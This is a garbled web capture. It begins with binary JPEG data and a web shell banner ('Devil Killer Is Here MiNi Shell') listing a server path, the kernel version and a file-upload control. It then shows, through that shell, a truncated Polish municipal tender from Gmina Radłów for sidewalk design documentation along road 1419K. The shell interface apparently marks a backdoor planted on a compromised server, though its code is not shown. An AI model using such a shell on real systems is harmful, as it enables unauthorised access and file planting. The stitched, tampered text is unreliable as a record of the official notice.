JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231229/0057821701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie dokumentacji projektowej na budowę chodnika wzdłuż drogi powiatowej 1419K relacji Jadowniki Mokre – Wał Ruda – Radłów”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radłów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660915</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaradlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaradlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie dokumentacji projektowej na budowę chodnika wzdłuż drogi powiatowej 1419K relacji Jadowniki Mokre – Wał Ruda – Radłów”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26c1a079-a57e-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00578217</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00035174/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 „Opracowanie dokumentacji projektowej na budowę chodnika wzdłuż drogi powiatowej 1419K relacji Jadowniki Mokre – Wał Ruda – Radłów”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-26c1a079-a57e-11ee-953e-c2ea26915e21 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym składnie ofert oraz<br/>przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu komunikacji elektronicznej na platformie:<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików<br/>przesłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesłanych jako załączniki<br/>do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32)77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl/pl/ z zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego pn. „Budowa pełnowymiarowej hali sportowej w Radłowie”.Odbiorcami<br/>przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji<br/>publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 9 do<br/>SWZ.Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli<br/>administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób<br/>pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego.<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby<br/>trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu<br/>przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 9 do SWZ. i) Sposób postępowania z danymi osobowymi, w tym ich udostępnianie itd. opisany został w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.31.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.	W części 1 pn. „Opracowanie dokumentacji projektowej budowy chodnika wzdłuż drogi powiatowej 1419K na odcinku od ronda w miejscowości Wał Ruda dz. nr 1111/1 do dz. nr 114/3 w miejscowości Wola Radłowska o dł. ok. 340mb”: <br/>a)	Wykonanie projektu budowlanego <br/>b)	Uzyskanie decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę lub zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia robót od właściwych miejscowo organów<br/>c)	Uzyskanie wszelkich innych niezbędnych decyzji, uzgodnień, pozwoleń niezbędnych do wykonania przedmiotu zamówienia, <br/>d)	Pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych na podstawie sporządzonej dokumentacji projektowe. <br/>e)	Zamawiający informuje, iż ponad powyższe szczegółowy opis i zakres przedmiotu zamówienia określają: <br/>	Opis przedmiotu zamówienia (OPZ) – Załącznik nr 4.1 do SWZ, <br/>	Projektowane postanowienia umowy – Załącznik nr 5 do SWZ<br/>2)	Wymagania wspólne dla wszystkich części zamówienia: <br/>a)	Dokumentacja projektowa winna być opracowana w zakresie niezbędnym do:<br/>-	przeprowadzenia postępowania o udzielenie zamówienia publicznego,<br/>-	realizacji robót budowlanych, w tym między innymi uzyskanie wszelkich opinii, uzgodnień i decyzji umożliwiających uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej lub uzyskanie pozwolenia na budowę zgodnie z Prawem Budowlanym.<br/>b) Dokumentację projektową (służącą również jako opis przedmiotu zamówienia w przyszłym postępowaniu) należy opracować zgodnie z wymogami obowiązujących aktów prawnych, w tym m.in.:<br/>-	ustawy z dnia 7 lipca 1994 r. Prawo budowlane, <br/>-	ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,<br/>-	ustawy z dnia 20 lipca 2017 r. Prawo wodne,<br/>-	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska,<br/>-	ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>-	rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych <br/>-	rozporządzenia Ministra Infrastruktury z dnia 16 lutego 2005 r. w sprawie sposobu numeracji i ewidencji dróg publicznych, obiektów mostowych, tuneli, przepustów i promów oraz rejestru numerów nadanych drogom, obiektom mostowym i tunelom, <br/>-	rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych <br/>c)	Dokumentację należy wykonać w pikietażu obowiązującym na drodze powiatowej z podaniem zmian jeśli występują. <br/>d)	W ramach zadania do obowiązków Wykonawcy należy również:<br/>•	opracowanie inwentaryzacji stanu istniejącego,<br/>•	wykonanie opracowania ewidencyjnego<br/>•	opracowanie rozwiązań projektowych mających za zadanie połączyć projektowany chodnik z chodnikami istniejącymi<br/>•	opracowanie koncepcji w zakresie rozwiązań technicznych i technologicznych <br/>•	uzyskanie pisemnego potwierdzenia właściwego organu braku konieczności uzyskania DŚU; opracowanie materiałów do decyzji o środowiskowych uwarunkowaniach (jeżeli zajdzie potrzeba uzyskania decyzji o środowiskowych uwarunkowaniach)<br/>•	wykonanie i opracowanie badań geologiczno-inżynieryjnych, geotechnicznych,<br/>•	opracowanie operatów wodnoprawnych (jeżeli zajdzie potrzeba uzyskania decyzji wodnoprawnej)<br/>•	projektowanie chodnika w pasie drogowym <br/>•	opracowanie kompleksowej dokumentacji projektowej w stadium projektu budowlanego,<br/>•	opracowanie kompleksowej dokumentacji projektowej w stadium projektu wykonawczego, w tym SST, przedmiarów i kosztorysów ofertowych,<br/>•	opracowanie przedmiarów oraz kosztorysów inwestorskich,<br/>•	wykonanie projektów rozbiórki obiektów budowlanych (jeżeli zajdzie taka konieczność),<br/>•	opracowanie map projektów podziału nieruchomości wraz z wykazami zmian danych ewidencyjnych (jeżeli zajdzie taka konieczność),<br/>•	wznowienie na gruncie punktów granicznych pasa drogowego znakami granicznymi według zasad określonych w przepisach dotyczących geodezji i kartografii, oraz przekazanie Zamawiającemu kopii protokołu z w/w czynności potwierdzonych przez Ośrodek Dokumentacji przed przekazaniem map do celów projektowych,<br/>•	wyznaczenie i utrwalenie na gruncie nowych granic pasa drogowego powstałych w wyniku podziałów zgodnie z prawomocną decyzją ZRID.<br/>•	Zamawiający udzieli Wykonawcy pełnomocnictwa w zakresie niezbędnym do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub uzyskanie pozwolenia na budowę zgodnie z Prawem Budowlanym <br/>3)	Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów zamówienia wchodzących w skład dokumentów postępowania, w tym Opisu przedmiotu zamówienia, łącznie z podatkiem VAT obowiązującym w dniu złożenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w każdej części zamówienia, zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena 60 punktów<br/>2.	Dodatkowy okres rękojmi za wady 20 punktów<br/>3.	Dodatkowe doświadczenie projektanta w specjalności drogowej 20 punktów<br/>	Razem	100 punktów<br/><br/>2.	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium „Cena” (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium „Dodatkowy okres rękojmi za wady” (Pr).<br/>Ocena ofert w tym kryterium dokonana zostanie na podstawie podanego przez wykonawcę w Formularzu ofertowym okresu rękojmi w pełnych latach, w oparciu o następujące zasady: <br/>Wykonawca, który zadeklaruje w swojej ofercie okres rękojmi:<br/>	3 lata – otrzyma 0 punktów,<br/>	4 lata – otrzyma 10 punktów,<br/>	5 lat – otrzyma 20 punktów.<br/>Jako minimalny okres rękojmi Zamawiający uważał będzie okres 3 lat, natomiast jako maksymalny 5 lat. Niepodanie przez wykonawcę w formularzu oferty okresu rękojmi za wady, skutkować będzie uznaniem, że wykonawca deklaruje okres rękojmi 3 lata. Bieg okresu rękojmi liczony będzie od dnia podpisania protokołu odbioru – według zasad określonych w projektowanych postanowieniach umowy. <br/><br/>c)	Sposób oceny ofert w kryterium „Dodatkowe doświadczenie zawodowe projektanta w specjalności drogowej” (Pd).<br/>Ocena ofert w tym kryterium dokonana zostanie na podstawie podanego przez Wykonawcę w Formularzu ofertowym dodatkowego doświadczenia zawodowego osoby mającej pełnić funkcję projektanta w specjalności inżynieryjnej drogowej, ponad doświadczenie wymagane dla tej osoby w ramach warunku udziału w postępowaniu określonego w Rozdziale II pkt. 7 SWZ. <br/>W związku z powyższy, Wykonawca, który przedstawi w swojej ofercie dodatkowe doświadczenie (tj. ponad wymagane przez Zamawiającego w Rozdziale II pkt. 7 SWZ), ww. projektanta w projektowaniu polegającym na wykonaniu:<br/>	1 dokumentacji projektowej dotyczącej budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 0 punktów,<br/>	2 dokumentacji projektowych dotyczących budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 10 punktów, <br/>	3 i więcej dokumentacji projektowych dotyczących budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 20 punktów<br/> <br/>d)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pr + Pd, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium Cena <br/>Pg - liczba punktów uzyskanych w kryterium Dodatkowy okres rękojmi za wady<br/>Pd - liczba punktów uzyskanych w kryterium Dodatkowe doświadczenie zawodowe projektanta w specjalności drogowej<br/><br/>3.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II.	W części 2 pn. „Opracowanie dokumentacji projektowej budowy chodnika wzdłuż drogi powiatowej 1419K na odcinku od dz. nr 911 w miejscowości Wola Radłowska do istniejącego chodnika w miejscowości Radłów ul. Woleńska dz. nr 472 dł. ok 846 mb.”<br/>a)	Wykonanie projektu budowlanego,<br/>b)	Uzyskanie decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę lub zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia robót od właściwych miejscowo organów,<br/>c)	Uzyskanie wszelkich innych niezbędnych decyzji, uzgodnień, pozwoleń niezbędnych do wykonania przedmiotu zamówienia, <br/>d)	Pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych na podstawie sporządzonej dokumentacji projektowe. <br/>e)	Zamawiający informuje, iż ponad powyższe szczegółowy opis i zakres przedmiotu zamówienia określają: <br/>	Opis przedmiotu zamówienia (OPZ) – Załącznik nr 4.2 do SWZ, <br/>	Projektowane postanowienia umowy – Załącznik nr 5 do SWZ<br/><br/>2)	Wymagania wspólne dla wszystkich części zamówienia: <br/>a)	Dokumentacja projektowa winna być opracowana w zakresie niezbędnym do:<br/>-	przeprowadzenia postępowania o udzielenie zamówienia publicznego,<br/>-	realizacji robót budowlanych, w tym między innymi uzyskanie wszelkich opinii, uzgodnień i decyzji umożliwiających uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej lub uzyskanie pozwolenia na budowę zgodnie z Prawem Budowlanym.<br/>b) Dokumentację projektową (służącą również jako opis przedmiotu zamówienia w przyszłym postępowaniu) należy opracować zgodnie z wymogami obowiązujących aktów prawnych, w tym m.in.:<br/>-	ustawy z dnia 7 lipca 1994 r. Prawo budowlane, <br/>-	ustawy z dnia 10 